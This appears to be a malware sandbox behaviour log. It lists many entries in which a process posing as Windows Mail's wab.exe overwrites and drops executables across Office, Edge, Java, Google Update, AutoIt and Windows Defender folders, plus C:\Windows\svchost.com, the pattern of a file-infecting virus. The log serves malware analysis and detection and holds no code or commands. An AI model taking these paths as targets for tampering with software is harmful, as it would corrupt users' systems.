Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Drops PE files
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
